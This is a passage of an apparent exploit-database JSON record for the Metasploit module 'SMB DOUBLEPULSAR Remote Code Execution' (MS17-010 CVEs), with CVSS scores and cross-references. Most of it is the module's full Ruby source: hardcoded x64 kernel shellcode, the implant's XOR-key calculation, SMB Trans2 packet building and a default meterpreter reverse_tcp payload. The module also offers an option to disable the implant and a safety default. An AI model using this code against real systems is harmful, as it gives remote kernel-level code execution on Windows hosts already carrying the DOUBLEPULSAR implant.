\\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:20:17", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "609eefc4ea5704bbcd49620ff6d484e8", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-26T00:14:40", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:14:40", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-26T00:14:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" 